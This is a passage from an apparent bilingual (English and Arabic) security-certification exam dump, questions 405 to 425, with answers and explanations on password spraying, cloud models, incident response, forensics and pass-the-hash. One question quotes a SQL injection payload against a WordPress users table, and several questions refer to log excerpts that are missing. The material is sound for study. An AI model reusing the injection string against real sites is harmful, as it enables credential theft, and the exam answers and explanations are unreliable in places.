B. Brute-force
C. Rainbow table
D. Spraying
Answer: D
Explanation:
Spraying is a password attack that involves trying a few common passwords against a large number of
usernames. Spraying is different from brute-force attacks, which try many possible passwords against
one username, or dictionary attacks, which try a list of words from a dictionary file against one
username. Spraying is often used when the web application has a lockout policy that prevents multiple
failed login attempts for the same username. Spraying can be detected by looking for patterns of failed
login attempts from the same source IP address with different usernames and the same or similar
passwords.
‫ يراجع محلل الأمان‬.‫ويقوم محلل أمني بالتحقيق فيما يبدو أنه وصول غير مأذون به إلى تطبيق شبكي تابع للشركات‬-405
‫ أي من هجمات كلمات المرور التالية تحدث؟ رش‬:‫سجلات خادم الويب ويجد الإدخالات التالية‬
‫ يختلف‬.‫ الرش هو هجوم كلمة مرور يتضمن تجربة بعض كلمات المرور الشائعة ضد عدد كبير من أسماء المستخدمين‬:‫التفسير‬
‫ أو هجمات‬، ‫ التي تجرب العديد من كلمات المرور المحتملة ضد اسم مستخدم واحد‬، ‫الرش عن هجمات القوة الغاشمة‬
‫ غالبا ما يتم استخدام الرش عندما يكون‬.‫ التي تجرب قائمة من الكلمات من ملف قاموس مقابل اسم مستخدم واحد‬، ‫القاموس‬
‫ يمكن اكتشاف الرش من خلال‬.‫لتطبيق الويب سياسة تأمين تمنع عدة محاولات تسجيل دخول فاشلة لنفس اسم المستخدم‬
‫ المصدر بأسماء مستخدمين مختلفة ونفس كلمات‬IP ‫البحث عن أنماط محاولات تسجيل الدخول الفاشلة من نفس عنوان‬
.‫المرور أو كلمات مرور مشابهة‬
232 / 198
The safer , easier way to help you pass any IT exams.
406.A company would like to move to the cloud. The company wants to prioritize control and security
over cost and ease of management. Which of the following cloud models would best suit this company's
priorities?
A. Public
B. Hybrid
C. Community
D. Private
Answer: D
Explanation:
A private cloud model would best suit the company's priorities of control and security over cost and ease
of management. In a private cloud, the infrastructure is dedicated to a single organization, providing
greater control over the environment and the ability to implement strict security measures. This is in
contrast to public, community, or hybrid cloud models, where resources are shared among multiple
organizations, potentially compromising control and security. While private clouds can be more
expensive and more difficult to manage, they the highest level of control and security for the company.
‫ أي من‬.‫ تريد الشركة إعطاء الأولوية للتحكم والأمن على التكلفة وسهولة الإدارة‬.‫ وتود إحدى الشركات الانتقال إلى السحابة‬-406
‫النماذج السحابية التالية يناسب أولويات هذه الشركة بشكل أفضل؟‬
‫إجابة\ خاصة‬
‫ في السحابة‬.‫ يناسب نموذج السحابة الخاصة أولويات الشركة المتمثلة في التحكم والأمن على التكلفة وسهولة الإدارة‬:‫شرح‬
.‫ مما يوفر تحكما أكبر في البيئة والقدرة على تنفيذ تدابير أمنية صارمة‬، ‫ يتم تخصيص البنية التحتية لمؤسسة واحدة‬، ‫الخاصة‬
‫ مما قد‬،‫ حيث تتم مشاركة الموارد بين مؤسسات متعددة‬،‫هذا على عكس النماذج السحابية العامة أو المجتمعية أو المختلطة‬
‫ إلا أنها أعلى‬، ‫ في حين أن السحب الخاصة يمكن أن تكون أكثر تكلفة وأكثر صعوبة في الإدارة‬.‫يعرض التحكم والأمان للخطر‬
.‫مستوى من التحكم والأمان للشركة‬
407.A company was recently breached. Part of the company's new cybersecurity strategy is to centralize
the logs from all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector can collect logs from various sources, such as servers, devices, applications, or network
components, and forward them to a central source for analysis and storage23.
‫ جزء من استراتيجية الأمن السيبراني الجديدة للشركة هو مركزية السجلات من جميع الأجهزة‬.‫ تم اختراق شركة مؤخرا‬-407
‫ أي من المكونات التالية يعيد توجيه السجلات إلى مصدر مركزي؟‬.‫الأمنية‬
‫جامع السجل ا‬
،‫ مثل الخوادم أو الأجهزة أو التطبيقات أو مكونات الشبكة‬،‫ يمكن لمجمع السجلات جمع السجلات من مصادر مختلفة‬:‫التفسير‬
.23‫وإعادة توجيهها إلى مصدر مركزي للتحليل والتخزين‬
233 / 198
The safer , easier way to help you pass any IT exams.
408.Which of the following automation use cases would best enhance the security posture Of an organization by rapidly updating permissions when employees leave a company Or change job roles internally?
A. Provisioning resources
B. Disabling access
C. APIs
D. Escalating permission requests
Answer: B
Explanation:
Disabling access is an automation use case that can enhance the security posture of an organization by
rapidly updating permissions when employees leave a company or change job roles internally. It can
prevent unauthorized access and data leakage by revoking or modifying the access rights of employees
based on their current status and role.
‫أي من حالات استخدام الأتمتة التالية من شأنها أن تعزز الوضع الأمني للمؤسسة على أفضل وجه عن طريق التحديث‬.408
‫السريع للأذونات عندما يغادر الموظفون الشركة أو تغيير الأدوار الوظيفية فيما بينهم؟ تعطيل الوصول‬
‫ تعطيل الوصول هو حالة استخدام أتمتة يمكن أن تعزز الوضع الأمني للمؤسسة من خلال تحديث الأذونات بسرعة‬:‫تفسير‬
‫ يمكنه منع الوصول غير المصرح به وتسرب البيانات عن‬.‫عندما يغادر الموظفون الشركة أو يغيرون الأدوار الوظيفية داخليا‬
.‫طريق إلغاء أو تعديل حقوق الوصول للموظفين بناء على وضعهم الحالي ودورهم‬
409.A company is enhancing the security of the wireless network and needs to ensure only employees
with a valid certificate can authenticate to the network.
Which of the following should the company implement?
A. PEAP
B. PSK
C. WPA3
D. WPS
Answer: A
Explanation:
PEAP stands for Protected Extensible Authentication Protocol, which is a protocol that can provide
secure authentication for wireless networks. PEAP can use certificates to authenticate the server and the
client, or only the server. PEAP can also use other methods, such as passwords or tokens, to
authenticate the client. PEAP can ensure only employees with a valid certificate can authenticate to the
network.
‫ تعمل إحدى الشركات على تعزيز أمن الشبكة اللاسلكية وتحتاج إلى ضمان أن الموظفين الذين لديهم شهادة صالحة فقط‬-409
‫ أي مما يلي يجب على الشركة تنفيذه؟ بياب‬.‫يمكنهم المصادقة على الشبكة‬
.‫ وهو بروتوكول يمكنه توفير مصادقة آمنة للشبكات اللاسلكية‬، ‫ إلى بروتوكول المصادقة الموسعة المحمي‬PEAP ‫ يرمز‬:‫تفسير‬
‫ مثل‬، ‫ أيضا استخدام طرق أخرى‬PEAP ‫ يمكن ل‬.‫ أو الخادم فقط‬،‫ استخدام الشهادات لمصادقة الخادم والعميل‬PEAP ‫يمكن ل‬
‫ أن الموظفين الذين لديهم شهادة صالحة فقط‬PEAP ‫ يمكن أن تضمن‬.‫ لمصادقة العميل‬، ‫كلمات المرور أو الرموز المميزة‬
.‫يمكنهم المصادقة على الشبكة‬
234 / 198
The safer , easier way to help you pass any IT exams.
410.A network architect wants a server to have the ability to retain network availability even if one of the
network switches it is connected to goes down.
Which of the following should the architect implement on the server to achieve this goal?
A. RAID
B. UPS
C. NIC teaming
D. Load balancing
Answer: C
Explanation:
NIC Teaming is a feature that allows a server to be connected to multiple network switches, providing
redundancy and increased network availability. If one of the switches goes down, the server will still be
able to send and receive data through one of the other switches.
‫يريد مهندس الشبكة أن يكون للخادم القدرة على الاحتفاظ بتوافر الشبكة حتى في حالة تعطل أحد مفاتيح الشبكة المتصل‬.410
NIC ‫ أي مما يلي يجب على المهندس المعماري تنفيذه على الخادم لتحقيق هذا الهدف؟ فريق‬.‫به‬
‫ إذا‬.‫ مما يوفر التكرار وزيادة توفر الشبكة‬، ‫ هي ميزة تسمح بتوصيل الخادم بمحولات شبكة متعددة‬Teaming NIC :‫التفسير‬
.‫ فسيظل الخادم قادرا على إرسال واستقبال البيانات من خلال أحد المفاتيح الأخرى‬، ‫تعطل أحد المفاتيح‬
411.A security analyst is currently addressing an active cyber incident. The analyst has been able to
identify affected devices that are running a malicious application with a unique hash.
Which of the following is the next step according to the incident response process?
A. Recovery
B. Lessons learned
C. Containment
D. Preparation
Answer: C
Explanation:
Containment is the next step according to the incident response process after identifying affected
devices that are running a malicious application with a unique hash. Containment involves isolating the
compromised devices or systems from the rest of the network to prevent the spread of the attack and
limit its impact. Containment can be done by disconnecting the devices from the network, blocking
network traffic to or from them, or applying firewall rules or access control lists. Containment is a critical
step in incident response because it helps to preserve evidence for further analysis and remediation, and
reduces the risk of data loss or exfiltration.
‫ تمكن المحلل من تحديد الأجهزة المتأثرة التي تقوم بتشغيل تطبيق ضار‬.‫ويعالج محلل أمني حاليا حادثا سيبرانيا نشطا‬-411
‫ أي مما يلي هو الخطوة التالية وفقا لعملية الاستجابة للحوادث؟ الاحتواء‬.‫بتجزئة فريدة‬
‫ الاحتواء هو الخطوة التالية وفقا لعملية الاستجابة للحوادث بعد تحديد الأجهزة المتأثرة التي تقوم بتشغيل تطبيق ضار‬:‫تفسير‬
‫ يمكن أن‬.‫ يتضمن الاحتواء عزل الأجهزة أو الأنظمة المخترقة عن بقية الشبكة لمنع انتشار الهجوم والحد من تأثيره‬.‫بتجزئة فريدة‬
‫ أو تطبيق قواعد جدار الحماية أو‬، ‫ أو حظر حركة مرور الشبكة منها أو إليها‬، ‫يتم الاحتواء عن طريق فصل الأجهزة عن الشبكة‬
‫ يعد الاحتواء خطوة حاسمة في الاستجابة للحوادث لأنه يساعد في الحفاظ على الأدلة لمزيد من‬.‫قوائم التحكم في الوصول‬
.‫ ويقلل من مخاطر فقدان البيانات أو التسلل‬، ‫التحليل والمعالجة‬
235 / 198
The safer , easier way to help you pass any IT exams.
412.Which of the following is the correct order of evidence from most to least volatile in forensic
analysis?
A. Memory, disk, temporary filesystems, CPU cache
B. CPU cache, memory, disk, temporary filesystems
C. CPU cache, memory, temporary filesystems, disk
D. CPU cache, temporary filesystems, memory, disk
Answer: C
Explanation:
The correct order of evidence from most to least volatile in forensic analysis is based on how quickly the
evidence can be lost or altered if not collected or preserved properly. CPU cache is the most volatile type
of evidence because it is stored in a small amount of memory on the processor and can be overwritten
or erased very quickly. Memory is the next most volatile type of evidence because it is stored in RAM
and can be lost when the system is powered off or rebooted. Temporary filesystems are less volatile than
memory because they are stored on disk, but they can still be deleted or overwritten by other processes
or users. Disk is the least volatile type of evidence because it is stored on permanent storage devices
and can be recovered even after deletion or formatting, unless overwritten by new data.
‫أي مما يلي هو الترتيب الصحيح للأدلة من الأكثر إلى الأقل تقلبا في تحليل الطب الشرعي؟‬.412
‫ذاكرة التخزين المؤقت لوحدة المعالجة المركزية والذاكرة وأنظمة الملفات المؤقتة والقرص‬
‫ يعتمد الترتيب الصحيح للأدلة من الأكثر إلى الأقل تقلبا في تحليل الطب الشرعي على مدى سرعة فقدان الأدلة أو تغييرها إذا‬:‫تفسير‬
‫ ذاكرة التخزين المؤقت لوحدة المعالجة المركزية هي أكثر أنواع الأدلة تقلبا لأنه يتم تخزينها‬.‫لم يتم جمعها أو حفظها بشكل صحيح‬
‫ الذاكرة هي النوع التالي الأكثر تقلبا من‬.‫في كمية صغيرة من الذاكرة على المعالج ويمكن الكتابة فوقها أو محوها بسرعة كبيرة‬
‫ تعد أنظمة الملفات‬.‫الأدلة لأنها مخزنة في ذاكرة الوصول العشوائي ويمكن أن تضيع عند إيقاف تشغيل النظام أو إعادة تشغيله‬
‫ ولكن لا يزال من الممكن حذفها أو الكتابة فوقها بواسطة عمليات أو‬، ‫المؤقتة أقل تقلبا من الذاكرة لأنها مخزنة على القرص‬
‫ القرص هو أقل أنواع الأدلة تقلبا لأنه يتم تخزينه على أجهزة تخزين دائمة ويمكن استرداده حتى بعد الحذف أو‬.‫مستخدمين آخرين‬
.‫ ما لم يتم استبداله ببيانات جديدة‬، ‫التنسيق‬
413.A security analyst is reviewing packet capture data from a compromised host On the In the packet
capture. analyst locates packets that contain large of text,.
Which Of following is most likely installed on compromised host?
A. Keylogger
B. Spyware
C. Torjan
D. Ransomware
Answer: A
Explanation:
A keylogger is a type of malware that records the keystrokes of the user and sends them to a remote
attacker. The attacker can use the keystrokes to steal the user’s credentials, personal information, or
other sensitive data. A key logger can generate packets that contain large amounts of text, as the packet
capture data shows.
‫ يحدد المحلل الحزم التي تحتوي‬.‫يقوم محلل أمان بمراجعة بيانات التقاط الحزمة من مضيف مخترق في التقاط الحزمة‬.413
‫ أي مما يلي مثبت على الأرجح على مضيف مخترق؟ كلوغر‬.‫على عدد كبير من النصوص‬
‫ يمكن‬.‫ كلوغر هو نوع من البرامج الضارة التي تسجل ضغطات المفاتيح للمستخدم وترسلها إلى مهاجم عن بعد‬:‫تفسير‬
.‫للمهاجم استخدام ضغطات المفاتيح لسرقة بيانات اعتماد المستخدم أو المعلومات الشخصية أو البيانات الحساسة الأخرى‬
.‫ كما تظهر بيانات التقاط الحزمة‬، ‫يمكن لمسجل المفاتيح إنشاء حزم تحتوي على كميات كبيرة من النص‬
236 / 198
The safer , easier way to help you pass any IT exams.
414.An information security officer at a credit card transaction company is conducting a frameworkmapping exercise with the internal controls. The company recently established a new office in Europe. To
which of the following frameworks should the security officer map the existing controls' (Select two).
A. ISO
B. PCI DSS
C. SOC
D. GDPR
E. CSA
F. NIST
Answer: B,D
Explanation:
PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards and
requirements for organizations that store, process, or transmit payment card data. It aims to protect
cardholder data and prevent fraud and data breaches. GDPR (General Data Protection Regulation) is a
regulation that governs the collection, processing, and transfer of personal data of individuals in the
European Union. It aims to protect the privacy and rights of data subjects and impose obligations and
penalties on data controllers and processors. These are the frameworks that the security officer should
map the existing controls to, as they are relevant for a credit card transaction company that has a new
office in Europe
‫ ويقوم موظف لأمن المعلومات في شركة لمعاملات بطاقات الائتمان بإجراء عملية لرسم الخرائط الإطارية باستخدام‬-414
‫ إلى أي من الأطر التالية يجب على ضابط الأمن تعيين عناصر‬.‫ أنشأت الشركة مؤخرا مكتبا جديدا في أوروبا‬.‫الضوابط الداخلية‬
‫ بسي _ دسس‬.)‫التحكم الحالية (حدد اثنين‬
‫ (معيار أمان بيانات صناعة بطاقات الدفع) هو مجموعة من معايير الأمان و متطلبات المؤسسات التي تخزن‬DSS PCI :‫تفسير‬
GDPR .‫ يهدف إلى حماية بيانات حامل البطاقة ومنع الاحتيال وخروقات البيانات‬.‫بيانات بطاقة الدفع أو تعالجها أو ترسلها‬
‫ ويهدف‬.‫(اللائحة العامة لحماية البيانات) هي لائحة تحكم جمع ومعالجة ونقل البيانات الشخصية للأفراد في الاتحاد الأوروبي‬
‫ هذه هي الأطر التي‬.‫إلى حماية خصوصية وحقوق أصحاب البيانات وفرض التزامات وعقوبات على مراقبي البيانات ومعالجيها‬
‫ لأنها ذات صلة بشركة معاملات بطاقات الائتمان التي لديها مكتب جديد‬، ‫يجب على ضابط الأمن تعيين الضوابط الحالية لها‬
‫في أوروبا‬
237 / 198
The safer , easier way to help you pass any IT exams.
415.An audit identified Pll being utilized in the development environment of a crit-ical application. The
Chief Privacy Officer (CPO) is adamant that this data must be removed: however, the developers are
concerned that without real data they cannot perform functionality tests and search for specific data.
Which of the following should a security professional implement to best satisfy both the CPOs and the
development team's requirements?
A. Data purge
B. Data encryption
C. Data masking
D. Data tokenization
Answer: D
Explanation:
Data tokenization is a technique of replacing sensitive data with non-sensitive substitutes called tokens
that have no intrinsic value or meaning. It can satisfy both the CPO’s and the development team’s
requirements by removing personally identifiable information (PII) from the development environment of
a critical application while preserving the functionality and format of the data for testing purposes.
‫ يصر كبير مسؤولي‬.‫ وحددت مراجعة للحسابات استخدام سبل الوقاية من الثغرات في بيئة تطوير تطبيق نقدي‬-415
‫ يشعر المطورون بالقلق من أنه بدون بيانات حقيقية لا يمكنهم‬، ‫ ومع ذلك‬:‫) على أنه يجب إزالة هذه البيانات‬CPO( ‫الخصوصية‬
CPOs ‫ أي مما يلي يجب أن ينفذه أخصائي الأمن لتلبية متطلبات كل من‬.‫إجراء اختبارات وظيفية والبحث عن بيانات محددة‬
D :‫وفريق التطوير على أفضل وجه؟ ترميز البيانات الجواب‬
‫ ترميز البيانات هو تقنية لاستبدال البيانات الحساسة ببدائل غير حساسة تسمى الرموز المميزة التي ليس لها قيمة أو‬:‫التفسير‬
‫) من‬PII( ‫ وفريق التطوير عن طريق إزالة معلومات التعريف الشخصية‬CPO ‫ يمكن أن يلبي كل من متطلبات‬.‫معنى جوهري‬
.‫بيئة تطوير تطبيق مهم مع الحفاظ على وظائف وتنسيق البيانات لأغراض الاختبار‬
416.A backup operator wants to perform a backup to enhance the RTO and RPO in a highly time- and
storage-efficient way that has no impact on production systems.
Which of the following backup types should the operator use?
A. Tape
B. Full
C. Image
D. Snapshot
Answer: D
Explanation:
A snapshot backup is a type of backup that captures the state of a system at a point in time. It is highly
time- and storage-efficient because it only records the changes made to the system since the last
backup. It also has no impact on production systems because it does not require them to be offline or
paused during the backup process.
‫ بطريقة عالية الكفاءة من حيث الوقت والتخزين‬RPO‫ و‬RTO ‫ويريد مشغل النسخ الاحتياطي إجراء نسخ احتياطي لتعزيز‬.416
‫ أي من أنواع النسخ الاحتياطي التالية يجب أن يستخدمها المشغل؟ لقطه‬.‫وليس لها أي تأثير على أنظمة الإنتاج‬
‫ إنه فعال للغاية من‬.‫ النسخ الاحتياطي للقطة هو نوع من النسخ الاحتياطي الذي يلتقط حالة النظام في وقت معين‬:‫التفسير‬
‫ كما أنه ليس له أي تأثير‬.‫حيث الوقت والتخزين لأنه يسجل فقط التغييرات التي تم إجراؤها على النظام منذ آخر نسخة احتياطية‬
.‫على أنظمة الإنتاج لأنه لا يتطلب أن تكون غير متصلة بالإنترنت أو متوقفة مؤقتا أثناء عملية النسخ الاحتياطي‬
238 / 198
The safer , easier way to help you pass any IT exams.
417.A company needs to centralize its logs to create a baseline and have visibility on its security events.
Which of the following technologies will accomplish this objective?
A. Security information and event management
B. A web application firewall
C. A vulnerability scanner
D. A next-generation firewall
Answer: A
Explanation:
Security information and event management (SIEM) is a solution that collects, analyzes, and correlates
logs and events from various sources such as firewalls, servers, applications, etc., within an
organization’s network. It can centralize logs to create a baseline and have visibility on security events by
providing a unified dashboard and reporting system for log management and security monitoring.
‫ أي من التقنيات الآتية ستحقق هذا الهدف؟ معلومات الأمان وإدارة‬.‫ تحتاج الشركة إلى مركزية سجلاتها لإنشاء خط أساس ورؤية أحداثها الأمنية‬-417
‫الأحداث‬
‫) هو حل يجمع ويحلل ويربط السجلات والأحداث من مصادر مختلفة مثل جدران الحماية والخوادم‬SIEM( ‫ معلومات الأمان وإدارة الأحداث‬:‫تفسير‬
‫ يمكنه مركزية السجلات لإنشاء خط أساس والحصول على رؤية لأحداث الأمان من خلال توفير‬.‫ داخل شبكة المؤسسة‬، ‫والتطبيقات وما إلى ذلك‬
.‫لوحة معلومات موحدة ونظام تقارير لإدارة السجل ومراقبة الأمان‬
418.A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server was
exposing an API that should have only been available from the company’s mobile application.
After reviewing the back-end server logs, the security analyst finds the following entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. User-agent spoofing
C. WAF bypass
D. Referrer manipulation
Answer: B
Explanation:
User-agent spoofing is a technique that involves changing the user-agent string of a web browser or
other client to impersonate another browser or device. The user-agent string is a piece of information
that identifies the client to the web server and can contain details such as the browser name, version,
operating system, and device type. User-agent spoofing can be used to bypass security controls that rely
on the user-agent string to determine the legitimacy of a request. In this scenario, the consultants were
able to spoof the user-agent string of the company’s mobile application and access the API that should
have been restricted to it.
‫ كان‬.‫ تمكن الاستشاريون من تنزيل بيانات حساسة من خادم خلفي‬، ‫ أثناء اختبار الاختراق‬.‫ و يحقق محلل أمني في تقرير أجري عن اختبار اختراق‬-418
‫ بعد مراجعة سجلات‬.‫الخادم الخلفي يعرض واجهة برمجة تطبيقات كان من المفترض أن تكون متاحة فقط من تطبيق الهاتف المحمول للشركة‬
:‫ يجد محلل الأمان الإدخالات التالية‬، ‫الخادم الخلفية‬
‫أي مما يلي هو السبب الأكثر احتمالا لتجاوز التحكم الأمني؟ انتحال وكيل المستخدم‬
‫ انتحال وكيل المستخدم هو أسلوب يتضمن تغيير سلسلة وكيل المستخدم لمتصفح الويب أو عميل آخر لانتحال شخصية متصفح أو جهاز‬:‫تفسير‬
‫ سلسلة وكيل المستخدم هي جزء من المعلومات التي تحدد العميل لخادم الويب ويمكن أن تحتوي على تفاصيل مثل اسم المتصفح والإصدار‬.‫آخر‬
‫ يمكن استخدام انتحال وكيل المستخدم لتجاوز عناصر التحكم في الأمان التي تعتمد على سلسلة وكيل المستخدم‬.‫ونظام التشغيل ونوع الجهاز‬
‫ تمكن المستشارون من انتحال سلسلة وكيل المستخدم لتطبيق الهاتف المحمول الخاص بالشركة‬، ‫ في هذا السيناريو‬.‫لتحديد شرعية الطلب‬
.‫والوصول إلى واجهة برمجة التطبيقات التي كان يجب أن تقتصر عليها‬
239 / 198
The safer , easier way to help you pass any IT exams.
419.During a recent cybersecurity audit, the auditors pointed out various types of vulnerabilities in the
production area. The production area hardware runs applications that are critical to production.
Which of the following describes what the company should do first to lower the risk to the Production the
hardware.
A. Back up the hardware.
B. Apply patches.
C. Install an antivirus solution.
D. Add a banner page to the hardware.
Answer: B
Explanation:
Applying patches is the first step to lower the risk to the production hardware, as patches are updates
that fix vulnerabilities or bugs in the software or firmware. Patches can prevent attackers from exploiting
known vulnerabilities and compromising the production hardware. Applying patches should be done
regularly and in a timely manner, following a patch management policy and process.
.‫ أشار مراجعو الحسابات إلى أنواع مختلفة من نقاط الضعف في منطقة الإنتاج‬،‫ وخلال مراجعة حديثة للأمن السيبراني‬-419
‫ أي مما يلي يصف ما يجب على الشركة فعله أولا لتقليل‬.‫تقوم أجهزة منطقة الإنتاج بتشغيل التطبيقات المهمة للإنتاج‬
.‫المخاطر على إنتاج الأجهزة؟ تطبيق التصحيحات‬
‫ حيث أن التصحيحات هي تحديثات تعمل‬، ‫ يعد تطبيق التصحيحات الخطوة الأولى لتقليل المخاطر على أجهزة الإنتاج‬:‫تفسير‬
‫ يمكن أن تمنع التصحيحات المهاجمين من استغلال نقاط‬.‫على إصلاح نقاط الضعف أو الأخطاء في البرنامج أو البرامج الثابتة‬
‫ باتباع‬، ‫ يجب أن يتم تطبيق التصحيحات بانتظام وفي الوقت المناسب‬.‫الضعف المعروفة وتعريض أجهزة الإنتاج للخطر‬
.‫سياسة وعملية إدارة التصحيح‬
240 / 198
The safer , easier way to help you pass any IT exams.
420.A security analyst reviews web server logs and notices the following line:
104.35. 45.53 -[22/May/2020:07 : 00:58 +0100] "GET . UNION ALL SELECT
user login, user _ pass, user email from wp users—— HTTP/I.I" 200 1072
http://www.example.com/wordpress/wp—admin/ Which of the following
vulnerabilities is the attacker trying to exploit?
A. SSRF
B. CSRF
C. xss
D. SQLi
Answer: D
Explanation:
SQLi stands for SQL injection, which is a type of web security vulnerability that allows an attacker to
execute malicious SQL statements on a database server. SQLi can result in data theft, data corruption,
denial of service, or remote code execution.The attacker in the web server log is trying to exploit a SQLi
vulnerability by sending a malicious GET request that contains a UNION ALL SELECT statement. This
statement is used to combine the results oftwo or more SELECT queries into a single result set. The
attacker is attempting to retrieve user login, user pass, and user email from the wp users table, which is
a WordPress database table that stores userinformation. The attacker may use this information to
compromise the WordPress site or the users’ accounts.
. ‫] "احصل‬0100+ 00:58 :07 :2020 / ‫ مايو‬/ 22[ - 45.53 .104.35 :‫يستعرض محلل الأمن سجلات خادم الويب و يلاحظ السطر التالي‬.420
1072 200 "I.I / HTTP —— WP ‫ والبريد الإلكتروني للمستخدم من مستخدمي‬، _ ‫ وتمرير المستخدم‬، ‫تسجيل دخول المستخدم‬
‫ أي من الثغرات الأمنية التالية يحاول المهاجم استغلالها؟ اس كيو ال أي‬/ admin - http://www.example.com/wordpress/wp
‫ ضارة على خادم قاعدة‬SQL ‫ وهو نوع من ثغرة أمان الويب التي تسمح للمهاجم بتنفيذ عبارات‬، SQL ‫ إلى حقن‬SQLi ‫ يرمز‬:‫تفسير‬
‫ يحاول‬.‫ إلى سرقة البيانات أو تلف البيانات أو رفض الخدمة أو تنفيذ التعليمات البرمجية عن بعد‬SQLi ‫ يمكن أن يؤدي‬.‫البيانات‬
ALL UNION ‫ ضار يحتوي على عبارة‬GET ‫ عن طريق إرسال طلب‬SQLi ‫المهاجم في سجل خادم الويب استغلال ثغرة أمنية في‬
‫ يحاول المهاجم‬.‫ في مجموعة نتائج واحدة‬SELECT ‫ يتم استخدام هذه العبارة لدمج نتائج استعلامين أو أكثر من استعلامات‬.SELECT
‫ وهو جدول قاعدة‬، wp ‫استرداد تسجيل دخول المستخدم وتصريح المستخدم والبريد الإلكتروني للمستخدم من جدول مستخدمي‬
‫ أو حسابات‬WordPress ‫ قد يستخدم المهاجم هذه المعلومات لاختراق موقع‬.‫ يخزن معلومات المستخدم‬WordPress ‫بيانات‬
.‫المستخدمين‬
421.An organization is repairing damage after an incident.
Which Of the following controls is being implemented?
A. Detective
B. Preventive
C. Corrective
D. Compensating
Answer: C
Explanation:
Corrective controls are security measures that are implemented after an incident to repair the damage
and restore normal operations. They can include actions such as patching systems, restoring backups,
removing malware, etc. An organization that is repairing damage after an incident is implementing
corrective controls.
‫ أي من عناصر التحكم التالية يتم تنفيذها؟ تصحيحي‬.‫ تقوم منظمة بإصلاح الأضرار بعد وقوع حادث‬-421
‫ يمكن أن‬.‫ الضوابط التصحيحية هي تدابير أمنية يتم تنفيذها بعد وقوع حادث لإصلاح الضرر واستعادة العمليات العادية‬:‫تفسير‬
‫ تقوم المؤسسة التي‬.‫تتضمن إجراءات مثل أنظمة التصحيح واستعادة النسخ الاحتياطية وإزالة البرامج الضارة وما إلى ذلك‬
.‫تقوم بإصلاح الضرر بعد وقوع حادث بتنفيذ ضوابط تصحيحية‬
241 / 198
The safer , easier way to help you pass any IT exams.
422.A police department is using the cloud to share information city officials.
Which of the cloud models describes this scenario?
A. Hybrid
B. private
C. pubic
D. Community
Answer: D
Explanation:
A community cloud model describes a scenario where a cloud service is shared among multiple
organizations that have common goals, interests, or requirements. A community cloud can be hosted by
one of the organizations, a third-party provider, or a combination of both. A community cloud can offer
benefits such as cost savings, security, compliance, and collaboration. A police department using the
cloud to share information with city officials is an example of a community cloud model.
‫ أي من نماذج السحابة يصف هذا السيناريو؟‬.‫ وتستخدم إدارة شرطة السحابة لتبادل المعلومات مع مسؤولي المدينة‬-422
‫المجتمع‬
‫ يصف نموذج سحابة المجتمع سيناريو تتم فيه مشاركة خدمة سحابية بين مؤسسات متعددة لها أهداف أو اهتمامات‬:‫التفسير‬
‫ يمكن استضافة سحابة المجتمع بواسطة إحدى المؤسسات أو موفر تابع لجهة خارجية أو مزيج من‬.‫أو متطلبات مشتركة‬
‫ يعد قسم الشرطة الذي‬.‫ يمكن أن تقدم سحابة المجتمع مزايا مثل توفير التكاليف والأمان والامتثال والتعاون‬.‫الاثنين معا‬
.‫يستخدم السحابة لمشاركة المعلومات مع مسؤولي المدينة مثالا على نموذج سحابة المجتمع‬
423.A security analyst is reviewing computer logs because a host was compromised by malware After
the computer was infected it displayed an error screen and shut down. Which of the following should the
analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security too
Answer: A
Explanation:
A dump file is the first thing that a security analyst should review to determine more information about a
compromised device that displayed an error screen and shut down. A dump file is a file that contains a
snapshot of the memory contents of a device at the time of a system crash or error. A dump file can help
a security analyst analyze the cause and source of the crash or error, as well as identify any malicious
code or activity that may have triggered it.
، ‫يقوم محلل أمني بمراجعة سجلات الكمبيوتر بسبب تعرض مضيف للخطر بواسطة برامج ضارة بعد إصابة الكمبيوتر‬.423
‫ أي مما يلي يجب على المحلل مراجعته أولا لتحديد المزيد من المعلومات؟ ملف‬.‫عرض شاشة خطأ وتم إيقاف تشغيله‬
‫التفريغ‬
‫ ملف التفريغ هو أول شيء يجب على محلل الأمان مراجعته لتحديد مزيد من المعلومات حول جهاز مخترق عرض‬:‫تفسير‬
‫ ملف التفريغ هو ملف يحتوي على لقطة لمحتويات ذاكرة الجهاز في وقت تعطل النظام أو‬.‫شاشة خطأ وتم إيقاف تشغيله‬
‫ بالإضافة إلى تحديد أي تعليمات‬، ‫ يمكن أن يساعد ملف التفريغ محلل الأمان في تحليل سبب ومصدر التعطل أو الخطأ‬.‫خطأ‬
.‫برمجية أو نشاط ضار قد يكون قد تسبب فيه‬
242 / 198
The safer , easier way to help you pass any IT exams.
424.A security administrator is seeking a solution to prevent unauthorized access to the internal network.
Which of the following security solutions should the administrator choose?
A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN
Answer: D
Explanation:
A VPN (virtual private network) is a secure tunnel used to encrypt traffic and prevent unauthorized
access to the internal network. It is a secure way to extend a private network across public networks,
such as the Internet, and can be used to allow remote users to securely access resources on the internal
network. Additionally, a VPN can be used to prevent malicious traffic from entering the internal network.
‫ أي من حلول الأمان التالية يجب‬.‫ ويسعى مسؤول الأمن إلى إيجاد حل لمنع الوصول غير المأذون به إلى الشبكة الداخلية‬-424
VPN ‫أن يختارها المسؤول؟‬
‫ (الشبكة الافتراضية الخاصة) هي نفق آمن يستخدم لتشفير حركة المرور ومنع الوصول غير المصرح به إلى‬VPN :‫التفسير‬
‫ ويمكن استخدامها للسماح‬، ‫ مثل الإنترنت‬، ‫ إنها طريقة آمنة لتوسيع شبكة خاصة عبر الشبكات العامة‬.‫الشبكة الداخلية‬
VPN ‫ يمكن استخدام‬، ‫ بالإضافة إلى ذلك‬.‫للمستخدمين عن بعد بالوصول بأمان إلى الموارد الموجودة على الشبكة الداخلية‬
.‫لمنع حركة المرور الضارة من دخول الشبكة الداخلية‬
425.Security analysts notice a server login from a user who has been on vacation for two weeks, The analysts confirm that the user did not log in to the system while on vacation After reviewing packet capture
the analysts notice the following:
Which of the following occurred?
A. A buffer overflow was exploited to gain unauthorized access.
B. The user's account was con-promised, and an attacker changed the login credentials.
C. An attacker used a pass-the-hash attack to gain access.
D. An insider threat with username logged in to the account.
Answer: C
Explanation:
A pass-the-hash attack is a type of replay attack that captures and uses the hash of a password. The
attacker then attempts to log on as the user with the stolen hash. This type of attack is possible be-cause
